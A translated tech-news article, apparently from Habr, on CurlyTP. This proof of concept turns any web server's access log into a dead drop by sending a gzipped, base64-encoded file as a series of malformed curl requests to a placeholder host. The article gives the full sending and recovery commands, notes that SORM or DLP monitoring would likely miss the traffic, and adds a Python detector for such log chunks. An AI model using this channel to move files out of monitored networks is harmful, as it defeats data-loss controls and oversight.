Exchange of secret messages via server logs

According to Wikipedia, a dead drop is a tradecraft method for exchanging information or items between people through a secret location. The point is that the people never meet, yet they still exchange information while maintaining operational security.

The hiding place should not attract attention. That is why, in the offline world, inconspicuous things are used: a loose brick in a wall, a library book, or a hollow in a tree.

There are many tools for encryption and anonymization on the Internet, but the very fact of using them attracts attention. Besides, they may be blocked at the corporate or state level. What can be done?

Developer Ryan Flowers suggested an interesting option: use any web server as a dead drop. Think about it: what does a web server do? It accepts requests, serves files and writes a log. And it logs every request, even malformed ones!

It turns out that any web server lets you store almost any message in its log. Flowers thought about how to make use of this.

He proposes the following:

  1. Take a text file (the secret message) and compute its hash (md5sum).
  2. Encode it (gzip + uuencode).
  3. Write it to the log by means of deliberately malformed requests to the server.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode -m g.txt.gz g.txt.gz > g.txt.uue
[root@local ~]# IFS=$'\n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

To read the file, perform these operations in reverse order: decode and unzip the file, then check the hash (the hash can safely be transmitted over open channels).

Spaces are replaced with =+= so that the address contains no spaces. The program, which the author named CurlyTP, uses base64 encoding, just as email attachments do. Each request carries the keyword ?transfer? so that the recipient can easily find it in the logs.

What do we see in the logs in this case?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

As already mentioned, to receive the secret message you perform the operations in reverse order:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode -o g.txt.gz g.txt.gz.uue

[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

The process is easy to automate. The md5sum matches, and the file's contents confirm that everything was decoded correctly.
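The same pattern can be spotted from the log reader's side. The following script is an added example, not CurlyTP's own code: it scans access-log lines for the ?transfer? marker, groups the chunks by client and file name, reassembles and gunzips them, and checks the md5 so the content can be inspected. The log format, the IP addresses, the file name and the message are all constructed assumptions.

```python
import base64
import gzip
import hashlib
import re

# Combined log format (assumed): client, ident, user, [timestamp], "GET <path> HTTP/x.y" ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) HTTP/[\d.]+" ')

def build_sample_log(payload: bytes, name: str, client: str = "1.2.3.4") -> list:
    """Construct access-log lines in the page's format for testing the detector:
    gzip -> base64 with uuencode -m framing (60-char lines) -> spaces as =+= -> one GET each."""
    b64 = base64.b64encode(gzip.compress(payload, mtime=0)).decode()
    chunks = [f"begin-base64 644 {name}"]
    chunks += [b64[i:i + 60] for i in range(0, len(b64), 60)] + ["===="]
    log = ['9.9.9.9 - - [22/Aug/2019:21:11:59 -0400] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"']
    for n, chunk in enumerate(chunks):          # one request per encoded line
        q = chunk.replace(" ", "=+=")
        log.append(f'{client} - - [22/Aug/2019:21:12:{n % 60:02d} -0400] '
                   f'"GET /?transfer?{name}?{q} HTTP/1.1" 200 4050 "-" "curl/7.29.0"')
    return log

def detect_transfers(log_lines, marker="?transfer?") -> dict:
    """Flag requests carrying the CurlyTP marker and group their chunks by (client, file name)."""
    found = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _ts, path = m.groups()
        parts = path.split("?")                 # '/', 'transfer', <name>, <chunk>
        if marker not in path or len(parts) < 4:
            continue
        found.setdefault((client, parts[2]), []).append(parts[3].replace("=+=", " "))
    return found

def reassemble(chunks) -> tuple:
    """Drop the begin-base64/==== framing, base64-decode and gunzip; return (md5 hex, plaintext)."""
    body = "".join(c for c in chunks if not c.startswith("begin-base64") and c != "====")
    plain = gzip.decompress(base64.b64decode(body))
    return hashlib.md5(plain).hexdigest(), plain

def demo() -> tuple:
    secret = b"meet at the usual place, 21:00\n"   # constructed message, not from the page
    log = build_sample_log(secret, "g.gz.uue")
    hits = detect_transfers(log)
    digest, plain = reassemble(hits[("1.2.3.4", "g.gz.uue")])
    return len(hits), digest == hashlib.md5(secret).hexdigest(), plain == secret
```

The marker is only a convenience; a drop that omits it still shows up as a burst of long, high-entropy query strings from one client, so the grouping step is what a real detector should key on.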

The method is very simple. “The point of this exercise is just to prove that files can be transferred through innocent little web requests, and this works on any web server with plain text logs. Essentially, every web server is a dead drop!” writes Flowers.

Of course, the method only works if the recipient has access to the server logs. But many hosting providers, for example, do grant such access.

How can it be used?

Ryan Flowers says that he is not an information security specialist and will not enumerate CurlyTP's possible uses. For him it is just a proof of concept that the familiar tools we see every day can be used in unconventional ways.

In fact, this method has several advantages over other server-based dead drops such as Digital Dead Drop or PirateBox: it requires no special configuration on the server side and no special protocols, and it will not arouse suspicion among those who monitor traffic. It is unlikely that SORM or a DLP system would scan URLs for compressed text files.

This is one way to send messages through service files. Recall how some forward-thinking companies used to place developer job ads in HTTP headers or in the source of HTML pages.

The idea was that only web developers would notice such an Easter egg, since an ordinary person would not look at the headers or the HTML source.

Source: habr.com